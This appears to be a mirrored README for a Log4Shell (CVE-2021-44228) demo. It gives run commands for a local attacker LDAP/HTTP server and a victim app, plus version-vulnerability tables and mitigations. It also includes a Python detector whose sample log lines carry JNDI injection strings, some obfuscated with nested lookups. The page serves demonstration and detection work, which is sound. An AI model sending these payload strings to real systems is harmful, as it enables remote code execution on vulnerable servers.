Related vulnerability
Description
A short demo of CVE-2021-44228
Introduction
# sample-ldap-exploit
A short demo of CVE-2021-44228
## Build
~~~
$ mvn clean verify
~~~
## Run Attacker
~~~
$ java \
-cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar
~~~
URLs served by the attacker's HTTP listener on port 8080 (the LDAP `Reference` points the victim at the second one):
- `http://localhost:8080/`
- `http://localhost:8080/sample/payload/Payload.class`
## Run Victim
~~~
$ java \
-cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
sample.victim.Victim
~~~
## Results
### JDK / JRE
| Version | Status |
|----------------------------------|----------------------------------------------------------------------------|
| `Oracle JDK 8u5` | vulnerable |
| `OpenJDK 8u312` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `IBM OpenJDK 8u312-b07 (OpenJ9)` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.7+10` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.13+8` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 16+36` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17+35` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17.0.1+12` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
If NOT vulnerable, `javax.naming.Context.lookup()` returns the `javax.naming.Reference` object itself instead of fetching the class named in its codebase URL and instantiating it (the default of `com.sun.jndi.ldap.object.trustURLCodebase` flipped to `false` in 8u191 / 11.0.1, which matches the table above).
Note that the JNDI lookup and the outbound LDAP connection still happen: `trustURLCodebase=false` only blocks loading classes from remote code bases, so
other **Java deserialization vulnerabilities probably still exist**: a `javaSerializedData` attribute in the LDAP response is still deserialized on the victim, and a `Reference` naming a factory class that is already on the victim's classpath is still instantiated locally.
### log4j
| Version | Status |
|----------|-------------------------------------------------------------------------------------------------------------------|
| `2.9.1` | vulnerable |
| `2.10.0` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.14.1` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.15.0` | NOT vulnerable |
If NOT vulnerable, the `${jndi:ldap:...}` string is NOT resolved and is logged literally. The `log4j2.formatMsgNoLookups` property is only honoured from 2.10.0 onward, which is why 2.9.1 stays vulnerable regardless of it. 2.15.0 disables message lookups by default and restricts JNDI to localhost, which is enough to stop this demo; it was later found to be an incomplete fix for non-default configurations (CVE-2021-45046), so the practical remediation is to upgrade beyond 2.15.0 rather than rely on the property.
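The `${jndi:ldap:...}` string that log4j resolves is rarely sent in that literal form. log4j evaluates nested lookups such as `${lower:j}` or `${::-j}` before the outer lookup, so a detection that matches the literal `${jndi:` misses most real attempts. The following Python detector is an added example and not part of this repository: it normalises the three nesting forms log4j itself would collapse (`lower`, `upper` and the `:-` default-value form; other lookup types are not covered) and then scans constructed access-log lines for any JNDI URL scheme. The log lines, hosts and ports in it are made up for the example.

```python
import re

# Inner lookups that log4j 2.x evaluates before (and inside) the outer ${jndi:...}
# lookup. Attackers nest them to hide the literal "${jndi:" from naive signatures:
# ${lower:J} -> "j", ${upper:n} -> "N", and the default-value form ${name:-x}
# (the name may even be empty, as in ${::-j}) -> "x".
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")

# After normalisation: a JNDI lookup with any URL scheme (ldap, ldaps, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):", re.IGNORECASE)


def normalize(text, max_rounds=20):
    """Collapse nested lower/upper/default lookups from the inside out.

    Each regex only matches a lookup with no further ${...} inside it, so
    repeating until nothing changes resolves arbitrarily deep nesting. The
    round limit bounds the work on adversarial input.
    """
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(line):
    """Return the lower-cased URL scheme of every JNDI lookup found in the line."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(line))]


def scan(lines):
    """Return (line_number, schemes, normalized_line) for every line carrying a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        schemes = find_jndi_lookups(line)
        if schemes:
            hits.append((number, schemes, normalize(line)))
    return hits


# Constructed access-log lines (not real traffic). The LDAP target matches the demo's
# listener on localhost:1389; the last line carries a benign lookup-like string.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://localhost:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://localhost:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://localhost:1099/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, schemes, norm in scan(SAMPLE_LOGS):
        print(f"line {number}: jndi scheme(s) {schemes}: {norm}")
```

Run it as a script to see the three hidden lookups surface; the fifth line, which contains a `${date:...}` lookup but no JNDI scheme, is intentionally not flagged. Because the normaliser mirrors what log4j does before resolving, anything it flags would also have been resolved by a vulnerable 2.x version.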
File snapshot
~~~
[4.0K] /data/pocs/4da7d204bd3be540b799d95159b6b6929e1e3808
├── [4.0K] attacker
│   ├── [1.8K] pom.xml
│   └── [4.0K] src
│       └── [4.0K] main
│           └── [4.0K] java
│               └── [4.0K] sample
│                   └── [4.0K] attacker
│                       ├── [2.9K] Attacker.java
│                       └── [1.8K] ReferenceInterceptor.java
├── [4.0K] payload
│   ├── [ 789] pom.xml
│   └── [4.0K] src
│       └── [4.0K] main
│           └── [4.0K] java
│               └── [4.0K] sample
│                   └── [4.0K] payload
│                       └── [ 719] Payload.java
├── [ 569] pom.xml
├── [2.7K] README.md
└── [4.0K] victim
    ├── [1.5K] pom.xml
    └── [4.0K] src
        └── [4.0K] main
            └── [4.0K] java
                └── [4.0K] sample
                    └── [4.0K] victim
                        └── [ 532] Victim.java

18 directories, 9 files
~~~
Notes
1. Accessing the original source is recommended.
2. If the source is no longer available or cannot be reached, e-mail f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.